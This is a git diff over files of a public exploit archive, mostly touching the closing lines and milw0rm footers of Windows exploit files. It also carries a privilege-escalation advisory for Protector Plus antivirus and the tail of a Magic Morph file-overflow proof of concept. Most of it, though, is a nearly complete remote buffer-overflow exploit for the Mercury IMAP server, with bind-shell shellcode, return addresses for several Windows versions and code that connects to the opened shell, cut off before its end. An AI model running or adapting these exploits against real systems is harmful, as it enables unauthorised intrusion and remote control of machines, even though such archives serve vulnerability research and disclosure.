+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+} ;   
+   FILE *f;
+   f = fopen(fname ,"wb");
+   F *Gf;
+   Gf = (F*)malloc(sizeof(F));
+   Gf->a = 0x43;
+   Gf->b = 0x3A;
+   Gf->c = 0x5C;
+   uint8_t B[100];
+   memcpy(B, Gf, sizeof(Gf));
+   fwrite(B, sizeof(uint8_t), 3, f);
+   fwrite(hexfileP1, sizeof(uint8_t), sizeof(hexfileP1), f);
+   fwrite(hexfileP2, sizeof(uint8_t), sizeof(hexfileP2), f);
+   fwrite(hexfileP3, sizeof(uint8_t), sizeof(hexfileP3), f);
+   fclose(f);
+      }
+   void args(int argc, char *argv[])
+    { 
+    int file;
+    int a;
+    if(a) 
+    while((a = getopt(argc, argv, "f")) != EOF) {
+    switch(a)                                     {
+    case 'f':
+    file = (int)optarg;
+    break;
+    default:
+    exit(-1);
+                                                   }
+  						                           }
+                                                   }   
+    void Usage (char *Name)
+   { system("CLS");
+         printf("*********************************************************************\n");
+      fprintf ( stdout , "\t\tPortable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC\n");
+     printf("The usage is:\n");
+    
+     fprintf ( stdout , "\t\tAll Credits fl0 fl0w\n");
+         }   
+     void Menu()
+   { fprintf(stderr,
+    "\n"
+    "\t-f       FILE.mor\n"
+    "*********************************************************************"
+    "\n");
+   }         
+   
+  int main(int32_t argc , char *argv[])
+  {  if(argc < 2) {
+      Usage(argv[0]);             
+     Menu();             
+    
+     exit(-1);
+                  }  
+     char b[100];                  
+     strcpy(b, argv[2]);
+     strcat(b, ".mor");                 
+     buildFile(b);
+     printf("File DONE !\n");
+     return 0;
+      }      
+ //END Algorithm
+
+/ milw0rm.com [2009-09-14]
diff --git a/platforms/windows/local/966.c b/platforms/windows/local/966.c
index 785a3dd5f..738fa64ac 100755
--- a/platforms/windows/local/966.c
+++ b/platforms/windows/local/966.c
@@ -80,6 +80,6 @@ int main()
 	}
 	printf("View Lock Password: %s",bilgi_oku(4,3));
 	return 0;
-}
-
-// milw0rm.com [2005-04-28]
+}
+
+// milw0rm.com [2005-04-28]
diff --git a/platforms/windows/local/9680.txt b/platforms/windows/local/9680.txt
index 52cd0dfc0..e00898bd0 100755
--- a/platforms/windows/local/9680.txt
+++ b/platforms/windows/local/9680.txt
@@ -1,69 +1,69 @@
-ShineShadow Security Report 15092009-09
-
-TITLE
-
-Local privilege escalation vulnerability in Protector Plus antivirus software
-
-BACKGROUND
-
-Protector Plus range of antivirus products are known the world over for
-their efficiency and reliability. Protector Plus Antivirus Software is
-available for Windows Vista, Windows XP, Windows Me, Windows 2000,
-Windows 98, Windows 2000/2003/NT server and NetWare platforms. Protector
-Plus Antivirus Software is the ideal antivirus protection for your
-computer against all types of malware like viruses, trojans, worms and
-spyware.
-
--- www.pspl.com
-
-VULNERABLE PRODUCTS
-
-Protector Plus 2009 for Windows Desktops (8.0.E03)
-Protector Plus 2009 for Windows Server (8.0.E03)
-Protector Plus Professional (9.1.001)
-
-Previous versions may also be affected
-
-DETAILS
-
-Protector Plus installs the own program files with insecure permissions
-(Everyone - Full Control). Local attacker (unprivileged user) can
-replace some files (for example, executable files of Protector services)
-by malicious file and execute arbitary code with SYSTEM privileges. This
-is local privilege escalation vulnerability.
- 
-For example, the following attack scenario could be used:
-1. An attacker (unprivileged user) renames one of the Protector program
-files (below, the FILE). For example, the FILE could be - PPAVMON.exe
-(Protector Plus Anti-virus Monitor Service).
-2. An attacker copies his malicious executable file (with same name as
-the old filename of the FILE - PPAVMON.exe) to Protector folder.
-3. Restart the system.
-After restart attackers malicious file will be executed with SYSTEM
-privileges.
-
-EXPLOITATION
-
-This is local privilege escalation vulnerability. An attacker must have
-valid logon credentials to a system where vulnerable software is
-installed.
-
-WORKAROUND
-
-No workarounds
-
-DISCLOSURE TIMELINE
-
-31/08/2009 Initial vendor notification. Secure contacts requested.
-01/09/2009 Vendor response 
-03/09/2009 Vulnerability details sent. Confirmation requested. – no reply
-09/09/2009 Vulnerability details sent. Confirmation requested. – no reply
-11/09/2009 Last attempt to get reply from vendor. Vulnerability details sent. Confirmation requested. – no reply
-15/09/2009 Advisory released
-
-CREDITS 
-
-Maxim A. Kulakov (aka ShineShadow) 
-ss_contacts[at]hotmail.com 
-
-# milw0rm.com [2009-09-15]
+ShineShadow Security Report 15092009-09
+
+TITLE
+
+Local privilege escalation vulnerability in Protector Plus antivirus software
+
+BACKGROUND
+
+Protector Plus range of antivirus products are known the world over for
+their efficiency and reliability. Protector Plus Antivirus Software is
+available for Windows Vista, Windows XP, Windows Me, Windows 2000,
+Windows 98, Windows 2000/2003/NT server and NetWare platforms. Protector
+Plus Antivirus Software is the ideal antivirus protection for your
+computer against all types of malware like viruses, trojans, worms and
+spyware.
+
+-- www.pspl.com
+
+VULNERABLE PRODUCTS
+
+Protector Plus 2009 for Windows Desktops (8.0.E03)
+Protector Plus 2009 for Windows Server (8.0.E03)
+Protector Plus Professional (9.1.001)
+
+Previous versions may also be affected
+
+DETAILS
+
+Protector Plus installs the own program files with insecure permissions
+(Everyone - Full Control). Local attacker (unprivileged user) can
+replace some files (for example, executable files of Protector services)
+by malicious file and execute arbitary code with SYSTEM privileges. This
+is local privilege escalation vulnerability.
+ 
+For example, the following attack scenario could be used:
+1. An attacker (unprivileged user) renames one of the Protector program
+files (below, the FILE). For example, the FILE could be - PPAVMON.exe
+(Protector Plus Anti-virus Monitor Service).
+2. An attacker copies his malicious executable file (with same name as
+the old filename of the FILE - PPAVMON.exe) to Protector folder.
+3. Restart the system.
+After restart attackers malicious file will be executed with SYSTEM
+privileges.
+
+EXPLOITATION
+
+This is local privilege escalation vulnerability. An attacker must have
+valid logon credentials to a system where vulnerable software is
+installed.
+
+WORKAROUND
+
+No workarounds
+
+DISCLOSURE TIMELINE
+
+31/08/2009 Initial vendor notification. Secure contacts requested.
+01/09/2009 Vendor response 
+03/09/2009 Vulnerability details sent. Confirmation requested. – no reply
+09/09/2009 Vulnerability details sent. Confirmation requested. – no reply
+11/09/2009 Last attempt to get reply from vendor. Vulnerability details sent. Confirmation requested. – no reply
+15/09/2009 Advisory released
+
+CREDITS 
+
+Maxim A. Kulakov (aka ShineShadow) 
+ss_contacts[at]hotmail.com 
+
+# milw0rm.com [2009-09-15]
diff --git a/platforms/windows/local/9983.pl b/platforms/windows/local/9983.pl
index b417aab11..843723d6f 100755
--- a/platforms/windows/local/9983.pl
+++ b/platforms/windows/local/9983.pl
@@ -1,4 +1,3 @@
-
 #!/usr/bin/perl
 #=====================================
 #Xion Audio Player(.m3u File) Local buffer Overflow PoC
diff --git a/platforms/windows/remote/1026.cpp b/platforms/windows/remote/1026.cpp
index de5efeffa..8b325d21a 100755
--- a/platforms/windows/remote/1026.cpp
+++ b/platforms/windows/remote/1026.cpp
@@ -268,6 +268,6 @@ int main(int argc, char* argv[])
 	WSACleanup();
 
 	return 0;
-}
-
-// milw0rm.com [2005-06-02]
+}
+
+// milw0rm.com [2005-06-02]
diff --git a/platforms/windows/remote/1028.c b/platforms/windows/remote/1028.c
index 4ef767d77..2d91d2b4b 100755
--- a/platforms/windows/remote/1028.c
+++ b/platforms/windows/remote/1028.c
@@ -152,6 +152,6 @@ main (int argc, char **argv)
 	}
 	lame_sploit(argv[1],argv[2],argv[3]);
 
-}
-
-// milw0rm.com [2005-06-03]
+}
+
+// milw0rm.com [2005-06-03]
diff --git a/platforms/windows/remote/103.c b/platforms/windows/remote/103.c
index a009e52da..a51e8b386 100755
--- a/platforms/windows/remote/103.c
+++ b/platforms/windows/remote/103.c
@@ -259,6 +259,6 @@ void main(int argc,char ** argv)
 
 /*
 
-*/
-
-// milw0rm.com [2003-09-20]
+*/
+
+// milw0rm.com [2003-09-20]
diff --git a/platforms/windows/remote/1035.c b/platforms/windows/remote/1035.c
index efa2f5d83..e041cd6db 100755
--- a/platforms/windows/remote/1035.c
+++ b/platforms/windows/remote/1035.c
@@ -285,6 +285,6 @@ char* alphaEncodeShellcode(char *shellcode, int size)
 		strcat(encShellcode,buff);
 	}
 	return encShellcode;
-}
-
-// milw0rm.com [2005-06-07]
+}
+
+// milw0rm.com [2005-06-07]
diff --git a/platforms/windows/remote/1066.cpp b/platforms/windows/remote/1066.cpp
index 368084219..58d1c679e 100755
--- a/platforms/windows/remote/1066.cpp
+++ b/platforms/windows/remote/1066.cpp
@@ -126,6 +126,6 @@ printf("[+] close connection\n");
 
 WSACleanup();
 return;
-}
-
-// milw0rm.com [2005-06-24]
+}
+
+// milw0rm.com [2005-06-24]
diff --git a/platforms/windows/remote/1075.c b/platforms/windows/remote/1075.c
index 8360bc302..ec6bf2c2f 100755
--- a/platforms/windows/remote/1075.c
+++ b/platforms/windows/remote/1075.c
@@ -470,6 +470,6 @@ main (int argc, char **argv)
 
 
 return 0;
-}
-
-// milw0rm.com [2005-06-29]
+}
+
+// milw0rm.com [2005-06-29]
diff --git a/platforms/windows/remote/1079.html b/platforms/windows/remote/1079.html
index b7f0e6f69..27f29495f 100755
--- a/platforms/windows/remote/1079.html
+++ b/platforms/windows/remote/1079.html
@@ -135,6 +135,6 @@ for (i=0;i<750;i++) memory[i] = block + shellcode;
  
 Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit
 by the FrSIRT < http://www.frsirt.com >
-Solution - http://www.frsirt.com/english/advisories/2005/0935
-
-# milw0rm.com [2005-07-05]
+Solution - http://www.frsirt.com/english/advisories/2005/0935
+
+# milw0rm.com [2005-07-05]
diff --git a/platforms/windows/remote/109.c b/platforms/windows/remote/109.c
index c94eef4f8..61955433d 100755
--- a/platforms/windows/remote/109.c
+++ b/platforms/windows/remote/109.c
@@ -593,6 +593,6 @@ Sleep(60000);
 fclose(fp1); 
 return 0;
 
-}
-
-// milw0rm.com [2003-10-09]
+}
+
+// milw0rm.com [2003-10-09]
diff --git a/platforms/windows/remote/1096.txt b/platforms/windows/remote/1096.txt
index 78342ab02..dc5c9128c 100755
--- a/platforms/windows/remote/1096.txt
+++ b/platforms/windows/remote/1096.txt
@@ -49,6 +49,6 @@ GET CREDIT
    Soroush Dalili from GSG
    
 
 
    
 
-

    
-
-# milw0rm.com [2005-07-10]
+

    
+
+# milw0rm.com [2005-07-10]
diff --git a/platforms/windows/remote/1099.pl b/platforms/windows/remote/1099.pl
index b7f2cffb5..fc0a99df2 100755
--- a/platforms/windows/remote/1099.pl
+++ b/platforms/windows/remote/1099.pl
@@ -113,6 +113,6 @@ close($sock);
 print "[+] Domain: $site\n";
 print "[+] Path: $ARGV[2]\n";
 print "[+] 0wned!\n";
-exit();
-
-# milw0rm.com [2005-07-11]
+exit();
+
+# milw0rm.com [2005-07-11]
diff --git a/platforms/windows/remote/1108.pl b/platforms/windows/remote/1108.pl
index a459284f8..986765aaf 100755
--- a/platforms/windows/remote/1108.pl
+++ b/platforms/windows/remote/1108.pl
@@ -137,6 +137,6 @@ my $mw = MainWindow->new(-title => 'INFO',);
                 )->pack;
     $opt->addOptions([- Subject=>$subject],[- Version=>$vers],[- Vendor=>$vendor],[- Coder=>$codz]);   
     $mw->Button(-text=>'CLOSE', -command=>sub{$mw->destroy})->pack;
-    MainLoop;
-
-# milw0rm.com [2005-07-15]
+    MainLoop;
+
+# milw0rm.com [2005-07-15]
diff --git a/platforms/windows/remote/1115.pl b/platforms/windows/remote/1115.pl
index d28247bc4..6bbf4b0aa 100755
--- a/platforms/windows/remote/1115.pl
+++ b/platforms/windows/remote/1115.pl
@@ -123,6 +123,6 @@ my $mw = MainWindow->new(-title => 'INFO',);
                 )->pack;
     $opt->addOptions([- Subject=>$subject],[- Version=>$vers],[- Vendor=>$vendor],[- Coder=>$codz]);   
     $mw->Button(-text=>'CLOSE', -command=>sub{$mw->destroy})->pack;
-    MainLoop;
-
-# milw0rm.com [2005-07-21]
+    MainLoop;
+
+# milw0rm.com [2005-07-21]
diff --git a/platforms/windows/remote/1118.c b/platforms/windows/remote/1118.c
index 84e43fd21..8c33a21bc 100755
--- a/platforms/windows/remote/1118.c
+++ b/platforms/windows/remote/1118.c
@@ -277,6 +277,6 @@ int main(int argc, char *argv[]) {
 #endif
 
   return(0);
-}
-
-// milw0rm.com [2005-07-25]
+}
+
+// milw0rm.com [2005-07-25]
diff --git a/platforms/windows/remote/1130.c b/platforms/windows/remote/1130.c
index 976ae31b0..939b3aa3f 100755
--- a/platforms/windows/remote/1130.c
+++ b/platforms/windows/remote/1130.c
@@ -129,6 +129,6 @@ main ( int argc, char* argv[] )
 	}
 	else
 		exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );
-}
-
-// milw0rm.com [2005-08-03]
+}
+
+// milw0rm.com [2005-08-03]
diff --git a/platforms/windows/remote/1131.c b/platforms/windows/remote/1131.c
index 5311ddeb8..e46e91bf1 100755
--- a/platforms/windows/remote/1131.c
+++ b/platforms/windows/remote/1131.c
@@ -160,6 +160,6 @@ main ( int argc, char* argv[] )
 	}
 	else
 		exploit ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 );
-}
-
-// milw0rm.com [2005-08-03]
+}
+
+// milw0rm.com [2005-08-03]
diff --git a/platforms/windows/remote/1132.c b/platforms/windows/remote/1132.c
index 3ce8a8724..2e9f34086 100755
--- a/platforms/windows/remote/1132.c
+++ b/platforms/windows/remote/1132.c
@@ -1077,6 +1077,6 @@ main ( int argc, char* argv[] )
 		break;
 		}
 	}
-}
-
-// milw0rm.com [2005-08-03]
+}
+
+// milw0rm.com [2005-08-03]
diff --git a/platforms/windows/remote/1147.pm b/platforms/windows/remote/1147.pm
index 8391cee4b..74394e0d6 100755
--- a/platforms/windows/remote/1147.pm
+++ b/platforms/windows/remote/1147.pm
@@ -394,6 +394,6 @@ sub AgentSend {
 	return $sock->Send(pack('N', 0x80000000 + length($data)) . $data);
 }
 
-1;
-
-# milw0rm.com [2005-08-11]
+1;
+
+# milw0rm.com [2005-08-11]
diff --git a/platforms/windows/remote/1150.pm b/platforms/windows/remote/1150.pm
index b47200dd3..c638f99e5 100755
--- a/platforms/windows/remote/1150.pm
+++ b/platforms/windows/remote/1150.pm
@@ -127,6 +127,6 @@ sub Exploit {
         return;
 }
 
-1;
-
-# milw0rm.com [2005-08-12]
+1;
+
+# milw0rm.com [2005-08-12]
diff --git a/platforms/windows/remote/1152.pm b/platforms/windows/remote/1152.pm
index c6165ade5..ee4f57b45 100755
--- a/platforms/windows/remote/1152.pm
+++ b/platforms/windows/remote/1152.pm
@@ -108,6 +108,6 @@ sub Exploit {
 	return;
 }
 
-1;
-
-# milw0rm.com [2005-08-12]
+1;
+
+# milw0rm.com [2005-08-12]
diff --git a/platforms/windows/remote/116.c b/platforms/windows/remote/116.c
index 7ab3c492e..55a4f6733 100755
--- a/platforms/windows/remote/116.c
+++ b/platforms/windows/remote/116.c
@@ -157,6 +157,6 @@ int main(int argc, char **argv) {
 	printf("[-] Not connected! NIPrint probably not vulnerable!\n");
 
 	return 0;
-}
-
-// milw0rm.com [2003-11-04]
+}
+
+// milw0rm.com [2003-11-04]
diff --git a/platforms/windows/remote/117.c b/platforms/windows/remote/117.c
index 01591160b..2cdc74997 100755
--- a/platforms/windows/remote/117.c
+++ b/platforms/windows/remote/117.c
@@ -476,6 +476,6 @@ int main(int argc, char **argv)
     return 1;
 
 }
-
-
-// milw0rm.com [2003-11-07]
+
+
+// milw0rm.com [2003-11-07]
diff --git a/platforms/windows/remote/1178.c b/platforms/windows/remote/1178.c
index 1d44b0cdc..01fd074ab 100755
--- a/platforms/windows/remote/1178.c
+++ b/platforms/windows/remote/1178.c
@@ -162,6 +162,6 @@ int Conecta(char *Host, short puerto)
 	}
 
 	return Winsock;
-}
-
-// milw0rm.com [2005-08-25]
+}
+
+// milw0rm.com [2005-08-25]
diff --git a/platforms/windows/remote/1179.c b/platforms/windows/remote/1179.c
index c76e66d0a..3caadf599 100755
--- a/platforms/windows/remote/1179.c
+++ b/platforms/windows/remote/1179.c
@@ -440,6 +440,6 @@ main (int argc, char **argv)
 	recv(sockfd, recvbuf, 4096, 0);
 
 return 0;
-}
-
-// milw0rm.com [2005-08-25]
+}
+
+// milw0rm.com [2005-08-25]
diff --git a/platforms/windows/remote/1180.c b/platforms/windows/remote/1180.c
index 7c758342f..dae97fa93 100755
--- a/platforms/windows/remote/1180.c
+++ b/platforms/windows/remote/1180.c
@@ -440,6 +440,6 @@ main (int argc, char **argv)
 	recv(sockfd, recvbuf, 4096, 0);
 
 return 0;
-}
-
-// milw0rm.com [2005-08-25]
+}
+
+// milw0rm.com [2005-08-25]
diff --git a/platforms/windows/remote/119.c b/platforms/windows/remote/119.c
index 73f6580e6..43803716a 100755
--- a/platforms/windows/remote/119.c
+++ b/platforms/windows/remote/119.c
@@ -97,6 +97,6 @@ int main(void)
         FreeLibrary(hInstance);
 
         return 0;
-}
-
-// milw0rm.com [2003-11-12]
+}
+
+// milw0rm.com [2003-11-12]
diff --git a/platforms/windows/remote/1190.c b/platforms/windows/remote/1190.c
index e9901aa54..18907f62a 100755
--- a/platforms/windows/remote/1190.c
+++ b/platforms/windows/remote/1190.c
@@ -399,6 +399,6 @@ int check(char *host,unsigned short tport, unsigned int *sp){
                closesocket(sockTCP);
        return UNKNOWN;
        }
-}
-
-// milw0rm.com [2005-08-31]
+}
+
+// milw0rm.com [2005-08-31]
diff --git a/platforms/windows/remote/1193.pl b/platforms/windows/remote/1193.pl
index 34857e854..2847dad09 100755
--- a/platforms/windows/remote/1193.pl
+++ b/platforms/windows/remote/1193.pl
@@ -74,6 +74,6 @@ print "[*] QUIT..\n";
 print "[+] MAIL SPAMWNED!\n\n";
 close $remote;
 print "press any key to exit..\n";
-$bla= [STDIN];
-
-# milw0rm.com [2005-09-02]
+$bla= [STDIN];
+
+# milw0rm.com [2005-09-02]
diff --git a/platforms/windows/remote/1201.pl b/platforms/windows/remote/1201.pl
index 14bd962f1..80eacfb23 100755
--- a/platforms/windows/remote/1201.pl
+++ b/platforms/windows/remote/1201.pl
@@ -98,6 +98,6 @@ print $remote "$chop\n";
 print "W00t.FTP Flawned!\n";
 print "..press any key to exit\n";
 $bla= ;
-close $remote;
-
-# milw0rm.com [2005-09-07]
+close $remote;
+
+# milw0rm.com [2005-09-07]
diff --git a/platforms/windows/remote/121.c b/platforms/windows/remote/121.c
index 45e2c1967..330188005 100755
--- a/platforms/windows/remote/121.c
+++ b/platforms/windows/remote/121.c
@@ -236,6 +236,6 @@ long gimmeip(char *hostname)
 	}	
 	return ipaddr;
 }
-/*********************************************************************************/
-
-// milw0rm.com [2003-11-13]
+/*********************************************************************************/
+
+// milw0rm.com [2003-11-13]
diff --git a/platforms/windows/remote/1210.pm b/platforms/windows/remote/1210.pm
index c7d72b10b..ca3b79e45 100755
--- a/platforms/windows/remote/1210.pm
+++ b/platforms/windows/remote/1210.pm
@@ -151,6 +151,6 @@ sub Exploit
 	$self->Handler($s);
 	$s->Close();
 	return;
-}
-
-# milw0rm.com [2005-09-11]
+}
+
+# milw0rm.com [2005-09-11]
diff --git a/platforms/windows/remote/1223.c b/platforms/windows/remote/1223.c
index baad56f58..2c0b484e3 100755
--- a/platforms/windows/remote/1223.c
+++ b/platforms/windows/remote/1223.c
@@ -1,309 +1,309 @@
-/*   
-     Mercury imap4 server remote buffer overflow exploit
-     author : c0d3r "kaveh razavi" c0d3r@ihsteam.com c0d3r@c0d3r.org
-     package : Mercury mail transport system 4.01a and prolly prior
-     workaround : upgrade to 4.01b version
-     advisory : not available right now 
-     company address : www.pmail.com
-     timeline :
-     15 Sep 2005 : vulnerability reported by securiteam mailing list
-     20 Sep 2005 : IHS exploit released 
-     exploit features :
-     1) 5 working targets including win2k , winxp , win2k3
-     2) reliable metasploit shellcode
-     3) autoconnect to shell
-     bad chars are : 0x20 0x0a 
-     compiled with visual c++ 6 : cl mercury_imap.c 
-     greeting to :
-     www.ihsteam.com       the team , LorD and NT heya
-     www.ihsteam.net       english version ,
-     www.exploitdev.com    Jamie and Ben the two good brothers also my brothers
-     www.metasploit.com    when are you gonna release the newer version :P ?
-     www.class101.org      class with his new laptop :>
-     www.milw0rm.com       str0ke , I am sending it to you first dont doubt :d 
-     www.c0d3r.org         study time started :((( , pitty for the c0d3r !
-     shout to actionspider 
-     read these lines and try to understand ( I know you cant akhey ) that 
-     an script kiddie (defacer) never ever could be compared to an exploit coder
-     try to grow , being grown up is not related to age  -- with respects 
-/*
-/*
-
-D:\projects>mercury_imap.exe ihs 143 4 c0d3r abc
-
--------- mercury imap remote BOF exploit by c0d3r
-
-[+] target : windows 2003 server enterprise service pack 1
-[+] building login data
-[+] building overflow string
-[+] attacking host ihs
-[+] packet size = 625 byte
-[+] connected
-[+] sending login info
-[+] sending exploit string
-[+] exploit sent successfully to ihs
-[+] trying to get shell
-[+] connecting to ihs on port 4444
-[+] target exploited successfully
-[+] Dropping into shell
-
-Microsoft Windows [Version 5.2.3790]
-(C) Copyright 1985-2003 Microsoft Corp.
-
-H:\MERCURY>
-
-*/
-
-#include 
-#include 
-#include 
-#include 
-#pragma comment(lib, "ws2_32.lib")
-#define NOP 0x90
-#define size 625
-// nops + return address + 16 nops + shellcode 260 + 4 + 16 + 344 + 1   
-
-
-// metasploit shellcode LPORT=4444 Size=344 Encoder=PexFnstenvSub
-// bad chars : 0x00 0x0a 0x20 0x0d
-
-char shellcode[]=
-"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92"
-"\xc9\xd2\x3b\x83\xeb\xfc\xe2\xf4\x6e\xa3\x39\x76\x7a\x30\x2d\xc4"
-"\x6d\xa9\x59\x57\xb6\xed\x59\x7e\xae\x42\xae\x3e\xea\xc8\x3d\xb0"
-"\xdd\xd1\x59\x64\xb2\xc8\x39\x72\x19\xfd\x59\x3a\x7c\xf8\x12\xa2"
-"\x3e\x4d\x12\x4f\x95\x08\x18\x36\x93\x0b\x39\xcf\xa9\x9d\xf6\x13"
-"\xe7\x2c\x59\x64\xb6\xc8\x39\x5d\x19\xc5\x99\xb0\xcd\xd5\xd3\xd0"
-"\x91\xe5\x59\xb2\xfe\xed\xce\x5a\x51\xf8\x09\x5f\x19\x8a\xe2\xb0"
-"\xd2\xc5\x59\x4b\x8e\x64\x59\x7b\x9a\x97\xba\xb5\xdc\xc7\x3e\x6b"
-"\x6d\x1f\xb4\x68\xf4\xa1\xe1\x09\xfa\xbe\xa1\x09\xcd\x9d\x2d\xeb"
-"\xfa\x02\x3f\xc7\xa9\x99\x2d\xed\xcd\x40\x37\x5d\x13\x24\xda\x39"
-"\xc7\xa3\xd0\xc4\x42\xa1\x0b\x32\x67\x64\x85\xc4\x44\x9a\x81\x68"
-"\xc1\x9a\x91\x68\xd1\x9a\x2d\xeb\xf4\xa1\xc3\x67\xf4\x9a\x5b\xda"
-"\x07\xa1\x76\x21\xe2\x0e\x85\xc4\x44\xa3\xc2\x6a\xc7\x36\x02\x53"
-"\x36\x64\xfc\xd2\xc5\x36\x04\x68\xc7\x36\x02\x53\x77\x80\x54\x72"
-"\xc5\x36\x04\x6b\xc6\x9d\x87\xc4\x42\x5a\xba\xdc\xeb\x0f\xab\x6c"
-"\x6d\x1f\x87\xc4\x42\xaf\xb8\x5f\xf4\xa1\xb1\x56\x1b\x2c\xb8\x6b"
-"\xcb\xe0\x1e\xb2\x75\xa3\x96\xb2\x70\xf8\x12\xc8\x38\x37\x90\x16"
-"\x6c\x8b\xfe\xa8\x1f\xb3\xea\x90\x39\x62\xba\x49\x6c\x7a\xc4\xc4"
-"\xe7\x8d\x2d\xed\xc9\x9e\x80\x6a\xc3\x98\xb8\x3a\xc3\x98\x87\x6a"
-"\x6d\x19\xba\x96\x4b\xcc\x1c\x68\x6d\x1f\xb8\xc4\x6d\xfe\x2d\xeb"
-"\x19\x9e\x2e\xb8\x56\xad\x2d\xed\xc0\x36\x02\x53\x62\x43\xd6\x64"
-"\xc1\x36\x04\xc4\x42\xc9\xd2\x3b";
-
-
-  void gotshell (int newsock);
-  unsigned int rc,sock,os,addr,rc2 ;
-  struct sockaddr_in tcp;
-  struct hostent *hp;
-  WSADATA wsaData;
-  char buffer[size];
-  char point_esp[5];
-  unsigned short port;
-  char req1[] =  "\x30\x30\x30\x30\x20\x4C\x4F\x47\x49\x4E";
-  char req2[] =  "\x30\x30\x30\x31";
-  unsigned char *login,*exploit;
-  char vuln_command[] = "\x4C\x49\x53\x54";
-  char winxpsp1[]   = "\xCC\x59\xFB\x77"; // jmp esp in ntdll
-  char winxpsp2[]   = "\xED\x1E\x94\x7C"; // jmp esp (not tested)
-  char win2ksp4[]   = "\x23\xde\xaf\x01"; // call esp in kernel32.dll
-  char win2k3_sp0[] = "\xAB\x8B\xFB\x77"; // jmp esp in ntdll
-  char win2k3_sp1[] = "\x6A\xFA\xE8\x77"; // push esp - ret in kernel32
-                    
- int main (int argc, char *argv[]){
-  
-	
- if(argc < 6) {
- printf("\n-------- mercury imap remote BOF exploit by c0d3r\n");
- printf("-------- usage : imap.exe host port target username password\n");
- printf("-------- target 1 : windows xp service pack 1         : 0\n");
- printf("-------- target 2 : windows xp service pack 2         : 1\n");
- printf("-------- target 3 : windoes 2k advanced server sp 4   : 2\n");
- printf("-------- target 4 : windoes 2k3 server enterprise sp0 : 3\n");
- printf("-------- target 5 : windoes 2k3 server enterprise sp1 : 4\n");
- printf("-------- eg : imap.exe 127.0.0.1 143 0 c0d3r abc\n\n");	
- exit(-1) ;
-  } 
-  printf("\n-------- mercury imap remote BOF exploit by c0d3r\n\n");
- os = (unsigned short)atoi(argv[3]); 	 
-  switch(os)
-  {
-   case 0:
-    strcat(point_esp,winxpsp1);
-    printf("[+] target : windows xp service pack 1\n");
-	break;
-   case 1:
-    strcat(point_esp,winxpsp2); 
-    printf("[+] target : windows xp service pack 2\n");
-	break;
-   case 2:
-    strcat(point_esp,win2ksp4); 
-    printf("[+] target : windows 2000 advanced server service pack 4\n");
-	break;
-   case 3:
-	strcat(point_esp,win2k3_sp0);
-	printf("[+] target : windows 2003 server enterprise service pack 0\n");
-	break;
-   case 4:
-	strcat(point_esp,win2k3_sp1);
-	printf("[+] target : windows 2003 server enterprise service pack 1\n");
-	break;
-   default:
-    printf("\n[-] this target doesnt exist in the list\n\n");
-   
-    exit(-1);
-  }  
-	
-  printf("[+] building login data\n");
-  login = malloc(256);
-  memset(login,0,256);
-  sprintf(login,"%s %s %s\r\n",req1,argv[4],argv[5]);
-
-    // Creating heart of exploit code 4 5
-  
-    printf("[+] building overflow string");
-  
-    memset(buffer,NOP,size);
-    memcpy(buffer+260,point_esp,sizeof(point_esp)-1);
-    memcpy(buffer+280,shellcode,sizeof(shellcode)-1);
-    buffer[size] = 0;
-    exploit = malloc(1000);
-    memset(exploit,0,1000);
-    sprintf(exploit,"%s %s %s\r\n",req2,vuln_command,buffer);
-	
-   // EO heart of exploit code 
-
-  
-			if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
-   printf("[-] WSAStartup failed !\n");
-   exit(-1);
-  }
-	hp = gethostbyname(argv[1]);
-  Sleep(1500);
-  if (!hp){
-   addr = inet_addr(argv[1]);
-  }
-  if ((!hp)  && (addr == INADDR_NONE) ){
-   printf("[-] unable to resolve %s\n",argv[1]);
-   exit(-1);
-  }
-  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
-  if (!sock){ 
-   printf("[-] socket() error...\n");
-   exit(-1);
-  }
-	  if (hp != NULL)
-   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
-  else
-   tcp.sin_addr.s_addr = addr;
-
-  if (hp)
-   tcp.sin_family = hp->h_addrtype;
-  else
-  tcp.sin_family = AF_INET;
-  port=atoi(argv[2]);
-  tcp.sin_port=htons(port);
-   
-  
-  printf("\n[+] attacking host %s\n" , argv[1]) ;
-  
-  Sleep(1000);
-  
-  printf("[+] packet size = %d byte\n" , sizeof(buffer));
-  
-  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
-  if(rc==0)
-  {
-    
-     Sleep(1500) ;
-     printf("[+] connected\n") ;
-     printf("[+] sending login info\n") ;
-     send(sock,login,strlen(login),0);
-     Sleep(1500);
-     printf("[+] sending exploit string\n") ;
-     send(sock,exploit,strlen(exploit),0);
-     Sleep(1500);
-     printf("[+] exploit sent successfully to %s \n" , argv[1]);
-     printf("[+] trying to get shell\n");
-     printf("[+] connecting to %s on port 4444\n",argv[1]);
-     sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
-     Sleep(1500);
-     if (!sock){ 
-     printf("[-] socket() error...\n");
-     exit(-1);
-	 }
-	 tcp.sin_family = AF_INET;
-	 tcp.sin_port=htons(4444);
-	 rc2=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
-     if(rc2 != 0) {
-	 printf("[-] exploit probably failed\n");
-	 exit(-1);
-	 }
-     if(rc2==0)
-	 {
-	  printf("[+] target exploited successfully\n");
-      printf("[+] Dropping into shell\n\n");
-	 gotshell(sock);
-	 }
-  } 
-  
-  else {
